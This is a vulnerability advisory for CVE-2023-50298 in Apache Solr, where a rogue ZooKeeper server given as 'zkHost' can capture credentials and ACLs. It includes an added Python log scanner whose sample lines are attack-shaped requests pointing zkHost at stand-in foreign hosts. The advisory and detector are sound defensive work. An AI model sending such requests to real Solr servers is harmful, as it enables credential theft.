CVE-2023-50298
CVSS 3.1 Score 7.5 of 10 (high)
Details
Summary
CVE-2023-50298 is a vulnerability affecting Apache Solr versions 6.0.0 through 8.11.2, and 9.0.0 before 9.4.1. It allows unauthorized actors to gain access to sensitive information through a misconfiguration in the Solr Streaming Expressions feature. By setting up a rogue ZooKeeper server and providing it as the "zkHost" parameter in a streaming expression, an attacker can intercept ZooKeeper credentials and access control lists (ACLs), exposing sensitive information. Users are advised to upgrade to version 8.11.3 or 9.4.1 to mitigate this issue, as these versions restrict the use of ZooKeeper credentials and ACLs only to "zkHost" values with the same server address.
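The following is an added detection example, not code from the advisory or from Apache Solr: it scans request-log lines for streaming expressions whose "zkHost" names a server outside the cluster's own ZooKeeper ensemble, the same comparison the fixed versions apply. The trusted ensemble addresses, the sample log lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: the ZooKeeper ensemble this Solr cluster is really configured with.
TRUSTED_ZK = {"zk1.internal:2181", "zk2.internal:2181", "zk3.internal:2181"}

# zkHost as a named parameter of a streaming expression, quoted or bare.
ZKHOST_RE = re.compile(r'zkHost\s*=\s*(?:"([^"]*)"|([^",)\s&}]+))', re.IGNORECASE)

# Constructed sample lines, shaped like Solr request-log and HTTP access-log
# entries (the exact layout is an assumption; addresses are documentation ranges).
SAMPLE_LOG = [
    'INFO [c:docs] path=/stream params={expr=search(docs,'
    'zkHost="zk1.internal:2181,zk2.internal:2181/solr",q="*:*")} status=0',
    'INFO [c:docs] path=/stream params={expr=search(docs,'
    'zkHost="198.51.100.7:2181",q="*:*")} status=0',
    'GET /solr/docs/stream?expr=search(docs%2CzkHost%3D'
    '%22zk.example.net%3A2181%22%2Cq%3D%22*%3A*%22) HTTP/1.1',
]

def zk_servers(connect_string):
    """Split a ZooKeeper connect string into host:port entries, dropping any chroot."""
    hosts = connect_string.split("/", 1)[0]
    return {h.strip().lower() for h in hosts.split(",") if h.strip()}

def foreign_zkhosts(line, trusted=TRUSTED_ZK):
    """Return the zkHost values in one log line that name an untrusted server."""
    allowed = {t.lower() for t in trusted}
    decoded = unquote_plus(line)  # access logs carry the expression URL-encoded
    values = [quoted or bare for quoted, bare in ZKHOST_RE.findall(decoded)]
    return [v for v in values if not zk_servers(v) <= allowed]

def scan(lines, trusted=TRUSTED_ZK):
    """Return (line_number, [foreign zkHost values]) for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = foreign_zkhosts(line, trusted)
        if found:
            hits.append((n, found))
    return hits

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG):
        print(f"line {n}: zkHost outside trusted ensemble: {found}")
```

The comparison is an exact host:port string match, so an alias or IP address for a legitimate ZooKeeper node is also reported and needs to be added to the trusted set.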
Affected Products
- Apache Software Foundation Solr
- Apache Solr
Affected Vendors
- Apache Software Foundation